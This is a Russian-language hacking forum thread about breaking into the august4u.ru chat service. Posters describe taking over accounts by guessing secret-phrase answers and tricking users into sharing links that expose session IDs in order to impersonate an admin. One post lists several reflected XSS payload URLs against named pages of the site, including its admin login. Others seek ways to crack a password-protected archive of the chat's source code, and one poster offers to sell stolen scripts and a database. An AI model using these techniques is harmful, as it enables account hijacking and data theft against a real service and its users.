Ребята помогите,не надо мне давать конкретно что делать просто скажите что тут возможно и объясните как сделать,пожалуйста помогите!! Спасибо. _http://russianchat.august4u.ru/
тебе сюды http://forum.antichat.ru/thread9471.html все уязвимости были написаны!!! и пока новых ненайдено как найдем так сообщим
Всем привет) заходил на форум только ради августовских чатов... общаюсь в них был админам одного не скрою узнал много интересного... но Дело по моему пишет только "tanzwut" тебе мужик отдельный респект! По аугусту похоже только эта тема открыта осталась... хотелось бы немножко добавить от себя) про пароли и секретные фразы.. пароли естесно меняют все.. а вот к секретным фразам относяца не так внимательно) анкет админов правда не забирал... но в некоторых чатах угнал много(только ради спортивного интереса и большенство по секретным фразам ака смена пароля) за частую это был или ник или имя)) еще насчет секретных враз.. тут в другом посте писали что: админ может востановить пароль по этой фразе.. но секретную фразу можно поменять вместе с паролем) про пароли вроди все сказал) теперь собственно зачем заходил) ... до сегодняшнего дня сессию и ид можно было узнать простым вопросом... типа: "слухай (по)друг(а) а дай ссылочку на творчество на первое произведение плиз))".. сам сегодня сидел под ником админа в одном чате... можно было делать всё.. кроме кила, удаления анкет и захода в админку(там похоже ип свиряица.. имхо) но тема прикрылась( теперь только сессию можно так узнать, еще ее можно узнать спросив ссылку на смайлы... и собственно цель моего визита) если кто нить знает как узнать ид пользователя(собеседника) напишите пожалуйста в личку! буду очень признателен! за сим откланяюсь пожелав всем удачи и дольнейших поисков багов))))
Вобщем от делать нечего _http://august4u.ru/creation/write.inc?id="><script>alert(/bla/);</script> _http://august4u.ru/creation/write.inc?preview=1&Name=Admin%20%CB%CE%D5 _http://august4u.ru/creation/write.inc?preview=1&sessname="><script>alert(/bla/);</script> _http://august4u.ru/creation/write.inc?AuthorProfile=1&sessname="><script>alert(/bla/);</script> _http://august4u.ru/creation/write.inc?AuthorProfile=1&id="><script>alert(/bla/);</script> _http://august4u.ru/admin/auth/auth.php?AuthTitle=<script>alert(/bla/);</script> _http://august4u.ru/admin/auth/auth.php?AuthError=<script>alert(/bla/);</script> Летс Гоу..........
кстати народ лазил по просторам яндекса наткнулся на сайт там продают скрипты чата августа просят 150$ но есть возможность скачать архивы запароленые.......чем можно подобрать пароль на МНОГОпоточный рар?????
тыц Ты в разделе "Чаты" устроил "покупка, продажа" и "Soft - *nix/windows" Антошка2003 Он говорит что исходники можно скачать, только рар в котором они находятся защищен паролем и за пароль просят деньги, видимо так
по поводу продажы подробно тут - http://mini-rinok.ru/showthread.php?t=12 upd: тоха стукни в асю, разговор есть...
Че непонятного? есть два архива раровских запароленых внутри архива лежат какийта скрипты вот просят за них 150$
https://forum.antichat.ru/thread45723.html вот тут я выложил сорцы в паблик вчера.. так что те кто продаёт за 150 пусть обломяца я теперь продаю только расшифрованые скрипты и БД...
Предоставляю Вашему вниманию уникальный скрипт чата August4u.ru. Хочу Вам сказать, что халявы Вы здесь не найдёте! Скрипт платный! Скрипт находится в архивах. Архивы под паролем,разделены на 2 части.После оплаты вы получите пароль на почтовый ящик! Инструкция по установке прилагается! Скрипт чата August4u.ru <<<СКАЧАТЬ 1 часть>>> Скрипт чата August4u.ru <<<СКАЧАТЬ 2 часть>>> Оплату производите Любым способом в размере 150 wmz! вот как расписано=) чем бы пасс подобрать и посмотреть че там внутри.........
скачай то что выложил Tanzwut и попроси у этих челов чтобы дали тебе название файлов, какие есть в архиве
